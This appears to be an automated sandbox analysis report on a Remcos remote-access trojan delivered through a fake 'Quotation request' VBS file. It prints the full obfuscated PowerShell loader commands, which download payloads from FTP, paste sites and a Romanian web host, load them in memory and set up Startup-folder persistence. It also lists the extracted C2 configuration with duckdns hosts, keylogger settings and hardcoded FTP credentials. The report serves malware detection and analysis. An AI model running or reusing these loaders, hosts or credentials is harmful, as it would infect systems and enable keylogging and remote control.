'0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwAR
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwAR
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3200, TargetFilename: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidati

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7784, TargetFilename: C:\ProgramData\remcos\logs.dat
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T07:09:10.680432+020020204231Exploit Kit Activity Detected85.120.16.93443192.168.2.549710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T07:09:10.680432+020020204251Exploit Kit Activity Detected85.120.16.93443192.168.2.549710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T07:09:27.238212+020020365941Malware Command and Control Activity Detected192.168.2.549790172.111.244.1003981TCP
                    2024-10-07T07:09:28.738179+020020365941Malware Command and Control Activity Detected192.168.2.549801172.111.244.1003981TCP
                    2024-10-07T07:09:59.925258+020020365941Malware Command and Control Activity Detected192.168.2.549975172.111.244.1003981TCP
                    2024-10-07T07:10:00.034631+020020365941Malware Command and Control Activity Detected192.168.2.549977172.111.244.1003981TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T07:09:16.630552+020020327761Malware Command and Control Activity Detected192.168.2.549733192.169.69.263980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T07:09:08.864833+020028033053Unknown Traffic192.168.2.549709188.114.96.3443TCP
                    2024-10-07T07:09:13.092024+020028033053Unknown Traffic192.168.2.549712188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T07:09:29.288703+020028033043Unknown Traffic192.168.2.549807178.237.33.5080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T07:09:03.374482+020028410751Malware Command and Control Activity Detected192.168.2.549706188.114.96.3443TCP
                    2024-10-07T07:09:08.864833+020028410751Malware Command and Control Activity Detected192.168.2.549709188.114.96.3443TCP
                    2024-10-07T07:09:13.092024+020028410751Malware Command and Control Activity Detected192.168.2.549712188.114.96.3443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000016.00000002.2292074002.0000000000C38000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "2harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTATIONS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-NACZDT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: janbours92harbu04.duckdns.orgVirustotal: Detection: 6%Perma Link
                    Source: desckvbrat.com.brVirustotal: Detection: 7%Perma Link
                    Source: janbours92harbu03.duckdns.orgVirustotal: Detection: 9%Perma Link
                    Source: ftp.desckvbrat.com.brVirustotal: Detection: 8%Perma Link
                    Source: http://ftp.desckvbrat.com.brVirustotal: Detection: 8%Perma Link
                    Source: http://desckvbrat.com.brVirustotal: Detection: 7%Perma Link
                    Source: https://pastebin.com/raw/pQQ0n3eAVirustotal: Detection: 5%Perma Link
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2292074002.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2903471856.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2924119312.00000000026BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.2387288107.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,22_2_004338C8
                    Source: powershell.exe, 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f9e017c6-7

                    Exploits

                    barindex
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00407538 _wcslen,CoGetObject,22_2_00407538
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 85.120.16.93:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49813 version: TLS 1.2
                    Source: Binary string: F:\Source Coder Vb.net C#\crc crypter\Source code UpCry\Metodo DF\ClassLibrary3\ClassLibrary3\obj\Release\ClassLibrary3.pdb source: powershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3038298129.000001D6423B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,16_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10006580 FindFirstFileExA,16_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,22_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,22_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,22_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00407877 FindFirstFileW,FindNextFileW,22_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0044E8F9 FindFirstFileExA,22_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,22_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,27_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,29_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,22_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49733 -> 192.169.69.26:3980
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49790 -> 172.111.244.100:3981
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49801 -> 172.111.244.100:3981
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49975 -> 172.111.244.100:3981
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49977 -> 172.111.244.100:3981
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49709 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49706 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49712 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 85.120.16.93:443 -> 192.168.2.5:49710
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 85.120.16.93:443 -> 192.168.2.5:49710
                    Source: Malware configuration extractorURLs: 2harbu03.duckdns.org
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: pastebin.com
                    Source: global trafficTCP traffic: 191.252.83.213 ports 60803,1,2,60359,60710,21
                    Source: unknownDNS query: name: janbours92harbu04.duckdns.org
                    Source: unknownDNS query: name: janbours92harbu03.duckdns.org
                    Source: Yara matchFile source: 4.2.powershell.exe.1d629fb96e0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a8030f208.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1e6baf640.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.1650030d8e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.powershell.exe.1d62b3e4638.0.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 191.252.83.213:60710
                    Source: global trafficHTTP traffic detected: GET /d/9xfVr/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/P0BOw/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /images/server.txt HTTP/1.1Host: simonastolerciuc.roConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/FwIIK/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: M247GB M247GB
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49807 -> 178.237.33.50:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 188.114.96.3:443
                    Source: unknownFTP traffic detected: 191.252.83.213:21 -> 192.168.2.5:49704 220 "Servico de FTP da Locaweb"
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
